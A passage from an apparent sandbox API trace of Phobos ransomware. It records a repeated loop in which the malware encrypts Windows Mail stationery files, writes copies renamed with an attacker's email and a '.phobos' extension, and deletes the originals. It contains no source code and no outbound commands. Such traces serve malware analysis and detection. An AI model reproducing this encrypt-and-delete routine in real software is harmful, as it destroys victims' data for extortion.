dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0202.269] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=231) returned 1 [0202.269] CloseHandle (hObject=0x160) returned 1 [0202.269] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\garden.htm")) returned 0x2020 [0202.269] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.htm.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\garden.htm.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0202.270] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\garden.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0202.270] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0202.270] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0202.270] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.htm.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\garden.htm.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13c [0202.270] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32928) returned 1 [0202.270] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0202.270] ReadFile (in: hFile=0x160, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xe7, lpOverlapped=0x0) returned 1 [0202.271] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xf0, dwBufLen=0xf0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xf0) returned 1 [0202.271] WriteFile (in: hFile=0x13c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf0, lpOverlapped=0x0) returned 1 [0202.272] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32868) returned 1 [0202.272] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0202.272] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0202.272] CryptDestroyKey (hKey=0xa32868) returned 1 [0202.272] WriteFile (in: hFile=0x13c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0202.272] CryptDestroyKey (hKey=0xa32928) returned 1 [0202.272] CloseHandle (hObject=0x160) returned 1 [0202.272] CloseHandle (hObject=0x13c) returned 1 [0202.272] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\garden.htm")) returned 1 [0202.273] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0202.273] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\garden.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13c [0202.273] GetFileSizeEx (in: hFile=0x13c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=23871) returned 1 [0202.273] CloseHandle (hObject=0x13c) returned 1 [0202.274] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\garden.jpg")) returned 0x2020 [0202.274] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\garden.jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0202.274] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\garden.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13c [0202.274] SetFilePointerEx (in: hFile=0x13c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0202.274] SetFilePointerEx (in: hFile=0x13c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0202.274] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\garden.jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0202.274] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32928) returned 1 [0202.274] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0202.274] ReadFile (in: hFile=0x13c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x5d3f, lpOverlapped=0x0) returned 1 [0202.289] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x5d40, dwBufLen=0x5d40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x5d40) returned 1 [0202.289] WriteFile (in: hFile=0x160, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x5d40, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x5d40, lpOverlapped=0x0) returned 1 [0202.309] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32868) returned 1 [0202.309] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0202.309] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0202.315] CryptDestroyKey (hKey=0xa32868) returned 1 [0202.315] WriteFile (in: hFile=0x160, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0202.315] CryptDestroyKey (hKey=0xa32928) returned 1 [0202.315] CloseHandle (hObject=0x13c) returned 1 [0202.315] CloseHandle (hObject=0x160) returned 1 [0202.315] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\garden.jpg")) returned 1 [0202.334] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0202.334] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Green Bubbles.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\green bubbles.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0202.334] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=237) returned 1 [0202.335] CloseHandle (hObject=0x160) returned 1 [0202.335] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Green Bubbles.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\green bubbles.htm")) returned 0x2020 [0202.335] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Green Bubbles.htm.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\green bubbles.htm.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0202.335] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Green Bubbles.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\green bubbles.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0202.335] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0202.335] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0202.335] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Green Bubbles.htm.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\green bubbles.htm.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13c [0202.335] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32928) returned 1 [0202.335] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0202.335] ReadFile (in: hFile=0x160, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xed, lpOverlapped=0x0) returned 1 [0202.336] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xf0, dwBufLen=0xf0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xf0) returned 1 [0202.336] WriteFile (in: hFile=0x13c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf0, lpOverlapped=0x0) returned 1 [0202.337] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32868) returned 1 [0202.337] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0202.337] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0202.337] CryptDestroyKey (hKey=0xa32868) returned 1 [0202.337] WriteFile (in: hFile=0x13c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x102, lpOverlapped=0x0) returned 1 [0202.337] CryptDestroyKey (hKey=0xa32928) returned 1 [0202.337] CloseHandle (hObject=0x160) returned 1 [0202.337] CloseHandle (hObject=0x13c) returned 1 [0202.337] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Green Bubbles.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\green bubbles.htm")) returned 1 [0202.338] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0202.338] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\GreenBubbles.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\greenbubbles.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0202.352] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=6406) returned 1 [0202.352] CloseHandle (hObject=0xfc) returned 1 [0202.352] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\GreenBubbles.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\greenbubbles.jpg")) returned 0x2020 [0202.353] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\GreenBubbles.jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\greenbubbles.jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0202.353] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\GreenBubbles.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\greenbubbles.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0202.353] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0202.353] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0202.353] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\GreenBubbles.jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\greenbubbles.jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13c [0202.353] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32a28) returned 1 [0202.353] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0202.353] ReadFile (in: hFile=0xfc, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x1906, lpOverlapped=0x0) returned 1 [0202.362] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x1910, dwBufLen=0x1910 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x1910) returned 1 [0202.362] WriteFile (in: hFile=0x13c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x1910, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x1910, lpOverlapped=0x0) returned 1 [0202.363] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32928) returned 1 [0202.363] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0202.363] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0202.363] CryptDestroyKey (hKey=0xa32928) returned 1 [0202.363] WriteFile (in: hFile=0x13c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x102, lpOverlapped=0x0) returned 1 [0202.363] CryptDestroyKey (hKey=0xa32a28) returned 1 [0202.363] CloseHandle (hObject=0xfc) returned 1 [0202.363] CloseHandle (hObject=0x13c) returned 1 [0202.363] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\GreenBubbles.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\greenbubbles.jpg")) returned 1 [0202.364] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0202.364] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Hand Prints.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\hand prints.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13c [0202.364] GetFileSizeEx (in: hFile=0x13c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=235) returned 1 [0202.364] CloseHandle (hObject=0x13c) returned 1 [0202.364] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Hand Prints.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\hand prints.htm")) returned 0x2020 [0202.364] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Hand Prints.htm.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\hand prints.htm.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0202.365] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Hand Prints.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\hand prints.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13c [0202.365] SetFilePointerEx (in: hFile=0x13c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0202.365] SetFilePointerEx (in: hFile=0x13c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0202.365] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Hand Prints.htm.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\hand prints.htm.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0202.365] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32a28) returned 1 [0202.365] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0202.365] ReadFile (in: hFile=0x13c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xeb, lpOverlapped=0x0) returned 1 [0202.366] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xf0, dwBufLen=0xf0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xf0) returned 1 [0202.366] WriteFile (in: hFile=0xfc, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf0, lpOverlapped=0x0) returned 1 [0202.367] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32928) returned 1 [0202.367] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0202.367] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0202.367] CryptDestroyKey (hKey=0xa32928) returned 1 [0202.367] WriteFile (in: hFile=0xfc, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0202.367] CryptDestroyKey (hKey=0xa32a28) returned 1 [0202.367] CloseHandle (hObject=0x13c) returned 1 [0202.367] CloseHandle (hObject=0xfc) returned 1 [0202.367] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Hand Prints.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\hand prints.htm")) returned 1 [0202.368] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0202.368] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\handprints.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0202.369] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=4222) returned 1 [0202.369] CloseHandle (hObject=0xfc) returned 1 [0202.369] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\handprints.jpg")) returned 0x2020 [0202.369] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\handprints.jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0202.369] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\handprints.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0202.369] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0202.369] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0202.369] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\handprints.jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13c [0202.370] CryptImportKey (in: hProv=0xa24cf8, 